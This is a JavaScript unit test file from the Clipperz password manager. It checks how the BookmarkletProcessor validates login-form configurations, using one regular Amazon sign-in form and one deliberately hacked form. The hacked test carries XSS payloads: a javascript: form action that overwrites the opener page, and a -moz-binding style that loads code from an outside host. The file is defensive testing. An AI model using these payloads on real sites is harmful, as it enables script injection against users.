/* Copyright 2008-2013 Clipperz Srl This file is part of Clipperz, the online password manager. For further information about its features and functionalities please refer to http://www.clipperz.com. * Clipperz is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. * Clipperz is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details. * You should have received a copy of the GNU Affero General Public License along with Clipperz. If not, see http://www.gnu.org/licenses/. */ function testBookmarkletConfigurationString (aConfiguration, shouldFail, aMessage) { // var configuration; //try { // configuration = Clipperz.Base.evalJSON(aConfiguration); //} catch (exception) { // console.log("EXCEPTION", exception); // throw exception; //} //console.log("configuration", configuration); if (shouldFail == true) { try { Clipperz.PM.BookmarkletProcessor.checkBookmarkletConfiguration(aConfiguration); SimpleTest.ok(false, "vulnerability not caught - " + aMessage); } catch(exception) { SimpleTest.ok(true, "vulnerability correctly caught - " + aMessage); } } else { try { Clipperz.PM.BookmarkletProcessor.checkBookmarkletConfiguration(aConfiguration); SimpleTest.ok(true, "configuration correctly checked - " + aMessage); } catch(exception) { SimpleTest.ok(false, "configuration wrongly caught as malicious - " + aMessage); // console.log(exception); } } } //############################################################################# var tests = { //------------------------------------------------------------------------- 'simpleAmazonConfiguration_test': function () { var bookmarkletConfigurationString; bookmarkletConfigurationString = "{"+ "\"page\": {\"title\": \"Sign In\"},\n" + "\"form\": {" + "\"attributes\": {" + "\"action\": \"https://www.amazon.com/gp/flex/sign-in/select.html\",\n" + "\"method\": \"post\"" + "},\n" + "\"inputs\": [" + "{\"type\": \"hidden\",\n\"name\": \"path\",\n\"value\": \"/gp/yourstore\"},\n" + "{\"type\": \"hidden\",\n\"name\": \"useRedirectOnSuccess\",\n\"value\": \"1\"},\n" + "{\"type\": \"hidden\",\n\"name\": \"query\",\n\"value\": \"signIn=1&action=sign-out&useRedirectOnSuccess=1&path=/gp/yourstore&ref_=pd_irl_gw_r\"},\n" + "{\"type\": \"hidden\",\n\"name\": \"mode\",\n\"value\": \"\"},\n" + "{\"type\": \"hidden\",\n\"name\": \"redirectProtocol\",\n\"value\": \"\"},\n" + "{\"type\": \"hidden\",\n\"name\": \"pageAction\",\n\"value\": \"/gp/yourstore\"},\n" + "{\"type\": \"hidden\",\n\"name\": \"disableCorpSignUp\",\n\"value\": \"\"},\n" + "{\"type\": \"hidden\",\n\"name\": \"protocol\",\n\"value\": \"https\"},\n" + "{\"type\": \"hidden\",\n\"name\": \"sessionId\",\n\"value\": \"105-1479357-7902864\"},\n" + "{\"type\": \"hidden\",\n\"name\": \"referer\",\n\"value\": \"flex\"},\n" + "{\"type\": \"text\",\n\"name\": \"email\",\n\"value\": \"\"},\n" + "{\"type\": \"password\",\n\"name\": \"password\",\n\"value\": \"\"},\n" + "{\"type\": \"hidden\",\n\"name\": \"metadata1\",\n\"value\": \"Firefox 3.0.3 Mac\"},\n" + "{\"type\": \"hidden\",\n\"name\": \"metadataf1\",\n\"value\": \"\"},\n" + "{\"type\": \"hidden\",\n\"name\": \"metadata2\",\n\"value\": \"Default Plug-in Java Embedding Plugin Shockwave Flash 90124RealPlayer Plugin QuickTime Plug-in 7.5.5 Flip4Mac Windows Media Plugin 2.2 4||1440-900-878-24-*-*-*\"},\n" + "{\"type\": \"hidden\",\n\"name\": \"metadata3\",\n\"value\": \"timezone: -1 execution time: 3\"},\n" + "{\"name\": \"action\",\n\"type\": \"radio\",\n\"options\": [" + "{\"value\": \"new-user\",\n\"checked\": false},\n" + "{\"value\": \"sign-in\",\n\"checked\": true}" + "]}" + "]" + "},\n" + "\"version\": \"0.2.3\"" + "}"; testBookmarkletConfigurationString(bookmarkletConfigurationString, false, "regular Amazon.com configuration"); }, //------------------------------------------------------------------------- 'hackedConfigurationWithXSSAttackVectorReadyToBeTriggeredWhenActivatingTheDirectLogin_test': function () { var bookmarkletConfigurationString; bookmarkletConfigurationString = "{" + "\"page\": {\"title\": \"Example Attack\"}," + "\"form\": { " + "\"attributes\": { " + "\"action\": \"javascript:opener.document.body.innerHTML = 'hacked!';close();\", " + "\"style\": \"-moz-binding:url('http://ha.ckers.org/xssmoz.xml#xss')\", " + "\"method\": null " + "}, " + "\"inputs\": [" + "{\"type\": \"text\", \"name\": \"username\", \"value\": \"\"}, " + "{\"type\": \"password\", \"name\": \"password\", \"value\": \"\"}" + "]" + "}," + "\"version\": \"0.2.3\" " + "}"; testBookmarkletConfigurationString(bookmarkletConfigurationString, false, "hacked configuration that is trying to inject a XSS attack vector. It should not fail, as it is responsability of the direct login to avoid triggering such attack vector"); }, //------------------------------------------------------------------------- 'syntaxFix': MochiKit.Base.noop } //############################################################################# SimpleTest.runDeferredTests("Clipperz.PM.BookmarkletProcessor", tests, {trace:false});